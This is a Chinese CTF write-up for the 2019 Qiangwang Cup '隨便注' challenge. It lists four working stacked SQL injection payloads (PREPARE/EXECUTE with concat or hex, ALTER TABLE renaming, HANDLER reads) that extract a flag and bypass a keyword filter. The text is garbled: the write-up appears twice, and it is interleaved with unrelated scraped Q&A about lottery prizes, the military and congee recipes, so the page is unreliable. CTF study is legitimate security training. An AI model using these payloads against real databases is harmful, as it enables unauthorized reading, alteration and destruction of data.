[強網(wǎng)杯 2019]隨便注 1【SQL注入】四種解法
在《強網(wǎng)杯 2019》的挑戰(zhàn)中,題目要求解決SQL注入問題,以下是四種解法。
首先啟動靶機,輸入“1' or 1 = 1”進行測試,如果出現(xiàn)錯誤提示“error 1064”,說明存在SQL注入可能。通過在注入語句后添加“#”注釋符,嘗試輸出數(shù)據(jù),但未獲得flag。接著,我們手動探索數(shù)據(jù)表結(jié)構(gòu),通過“union select 1,2;#”來判斷字段個數(shù)。系統(tǒng)過濾了SQL關(guān)鍵字,于是采用堆疊注入繞過限制。
接下來,利用預(yù)編譯技術(shù)實現(xiàn)繞過過濾。注入語句“1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;”成功獲取了flag信息。
另一種方法是直接將SQL語句進行16進制編碼,或通過定義變量初始化SQL,然后執(zhí)行。注入語句“1';PREPARE hacker from 0x73656c656374202a2066726f6d20603139313938313039333131313435313460;EXECUTE hacker;”或“1';Set @jia = 0x73656c656374202a2066726f6d20603139313938313039333131313435313460;PREPARE hacker from @jia;EXECUTE hacker;”同樣獲取了flag。
第三種方法是通過更改表名和列名實現(xiàn)。假設(shè)默認顯示數(shù)據(jù)為words表,通過改變表名和列名,實現(xiàn)直接輸出flag。注入語句“1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);”成功獲取了flag信息。
最后一種方法是使用Mysql的HANDLE功能直接讀取數(shù)據(jù)。注入語句“1';HANDLER `1919810931114514` OPEN;HANDLER `1919810931114514` READ FIRST;HANDLER `1919810931114514` CLOSE;”直接獲取了答案。
在解決SQL注入問題時,預(yù)編譯、更改表名、使用HANDLE和直接繞過關(guān)鍵字限制等方法是常用的策略。具體實現(xiàn)時,根據(jù)具體環(huán)境靈活選擇合適的技巧。
鬱蕓14776227215: 我中一注任九,獎金多少呀?
漠河縣游標: ______ 國家體育總局剛剛宣布:本期R9獎金為0元,因河北043267投注站有人涉嫌造假,請夠買了彩票的朋友憑票到各自夠單處退取購買金. 中國國家體育總局 2005年12月22日
鬱蕓14776227215: 現(xiàn)在中國在世界上算不算是軍事強國?
漠河縣游標: ______ 一、中國擁有世界上比較強大的軍事隊伍,是世界軍隊人數(shù)最多的國家之一,中國軍... 中國是“導彈家族”的老大哥,中國的洲際導彈的誤差范圍為100米,美國的洲際導...
鬱蕓14776227215: 買22選5兩膽拖5個,中了一個膽,三個拖碼,有多少錢
漠河縣游標: ______ 二等獎1注、三等獎6注,獎金合計80元.滿意請采納
鬱蕓14776227215: 介紹壯族銅鼓?
漠河縣游標: ______ 壯族銅鼓習俗 三、銅鼓與民俗 銅鼓源遠流長,影響深遠.銅鼓聲音洪亮,在古代是... 1、特殊炊具 最初銅鼓是作飲器之用(即釜).它首先是作為特殊炊具使用,即作為裝...
鬱蕓14776227215: 用紅棗小米綠豆大米燕麥片能煮粥嗎 -
漠河縣游標: ______ 可以的,豆類用熱水浸泡口感更佳(用冷水泡會發(fā)芽),這幾類放在一起很香甜,口感很好,我試過 可以一起煮,既能補充水分,又容易消化.綠豆粥又是夏天的首選,綠豆清熱解毒,涼血敗火,同時添加幾顆紅棗,又能夠補血,補充出汗消耗的能量,特別適合夏天的晚上食用. 如何煮粥: 食材: 小米100g,綠豆50g,大米,燕麥片,紅棗適量,清水適量 步驟: 1.小米淘洗干凈. 2.放入電壓力鍋中.綠豆洗凈,也一同放入. 3.紅棗用熱水浸泡五分鐘.再用清水洗凈. 4.去核. 5.一起放入壓力鍋中. 6.加入適量清水. 7.將壓力鍋選擇豆類檔.煮熟即可.
鬱蕓14776227215: 請“隨便、東方飄紅、風流者”三位大師預(yù)測R9!請大師預(yù)測
漠河縣游標: ______ 500w任9中77注,14場2注,半全場1注,進球1注 估計14場獎金80萬,任9獎金5163元左右
首先啟動靶機,輸入“1' or 1 = 1”進行測試,如果出現(xiàn)錯誤提示“error 1064”,說明存在SQL注入可能。通過在注入語句后添加“#”注釋符,嘗試輸出數(shù)據(jù),但未獲得flag。接著,我們手動探索數(shù)據(jù)表結(jié)構(gòu),通過“union select 1,2;#”來判斷字段個數(shù)。系統(tǒng)過濾了SQL關(guān)鍵字,于是采用堆疊注入繞過限制。
接下來,利用預(yù)編譯技術(shù)實現(xiàn)繞過過濾。注入語句“1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;”成功獲取了flag信息。
另一種方法是直接將SQL語句進行16進制編碼,或通過定義變量初始化SQL,然后執(zhí)行。注入語句“1';PREPARE hacker from 0x73656c656374202a2066726f6d20603139313938313039333131313435313460;EXECUTE hacker;”或“1';Set @jia = 0x73656c656374202a2066726f6d20603139313938313039333131313435313460;PREPARE hacker from @jia;EXECUTE hacker;”同樣獲取了flag。
第三種方法是通過更改表名和列名實現(xiàn)。假設(shè)默認顯示數(shù)據(jù)為words表,通過改變表名和列名,實現(xiàn)直接輸出flag。注入語句“1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);”成功獲取了flag信息。
最后一種方法是使用Mysql的HANDLE功能直接讀取數(shù)據(jù)。注入語句“1';HANDLER `1919810931114514` OPEN;HANDLER `1919810931114514` READ FIRST;HANDLER `1919810931114514` CLOSE;”直接獲取了答案。
在解決SQL注入問題時,預(yù)編譯、更改表名、使用HANDLE和直接繞過關(guān)鍵字限制等方法是常用的策略。具體實現(xiàn)時,根據(jù)具體環(huán)境靈活選擇合適的技巧。
相關(guān)評說:
漠河縣游標: ______ 國家體育總局剛剛宣布:本期R9獎金為0元,因河北043267投注站有人涉嫌造假,請夠買了彩票的朋友憑票到各自夠單處退取購買金. 中國國家體育總局 2005年12月22日
漠河縣游標: ______ 一、中國擁有世界上比較強大的軍事隊伍,是世界軍隊人數(shù)最多的國家之一,中國軍... 中國是“導彈家族”的老大哥,中國的洲際導彈的誤差范圍為100米,美國的洲際導...
漠河縣游標: ______ 二等獎1注、三等獎6注,獎金合計80元.滿意請采納
漠河縣游標: ______ 壯族銅鼓習俗 三、銅鼓與民俗 銅鼓源遠流長,影響深遠.銅鼓聲音洪亮,在古代是... 1、特殊炊具 最初銅鼓是作飲器之用(即釜).它首先是作為特殊炊具使用,即作為裝...
漠河縣游標: ______ 可以的,豆類用熱水浸泡口感更佳(用冷水泡會發(fā)芽),這幾類放在一起很香甜,口感很好,我試過 可以一起煮,既能補充水分,又容易消化.綠豆粥又是夏天的首選,綠豆清熱解毒,涼血敗火,同時添加幾顆紅棗,又能夠補血,補充出汗消耗的能量,特別適合夏天的晚上食用. 如何煮粥: 食材: 小米100g,綠豆50g,大米,燕麥片,紅棗適量,清水適量 步驟: 1.小米淘洗干凈. 2.放入電壓力鍋中.綠豆洗凈,也一同放入. 3.紅棗用熱水浸泡五分鐘.再用清水洗凈. 4.去核. 5.一起放入壓力鍋中. 6.加入適量清水. 7.將壓力鍋選擇豆類檔.煮熟即可.
漠河縣游標: ______ 500w任9中77注,14場2注,半全場1注,進球1注 估計14場獎金80萬,任9獎金5163元左右
